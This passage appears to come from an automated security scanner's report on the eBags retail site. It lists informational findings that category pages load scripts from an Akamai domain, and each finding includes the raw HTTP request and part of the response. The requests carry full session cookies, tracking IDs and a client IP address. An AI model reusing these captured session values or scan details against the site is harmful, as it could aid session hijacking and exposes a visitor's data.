5.20. http://www.ebags.com/category/clutches/20048616 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20048616

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/clutches/20048616 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 95952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.21. http://www.ebags.com/category/cross-body-bags/20037212 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/cross-body-bags/20037212

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/cross-body-bags/20037212 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 116072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.22. http://www.ebags.com/category/handbags/10014 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/handbags/10014 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 117488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.23. http://www.ebags.com/category/handbags/10014/h/sale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014/h/sale

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/handbags/10014/h/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 118388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.24. http://www.ebags.com/category/hobos/20036674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20036674

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/hobos/20036674 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:01 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:01 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 113957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.25. http://www.ebags.com/category/hobos/20048614 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20048614

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/hobos/20048614 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:06 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:06 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.26. http://www.ebags.com/category/travel-accessories/20014443 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/travel-accessories/20014443

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

Response

5.27. http://www.ebags.com/department/backpacks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/backpacks

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.scrollingWidget.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.widthTrunc.min.js

Request

GET /department/backpacks HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
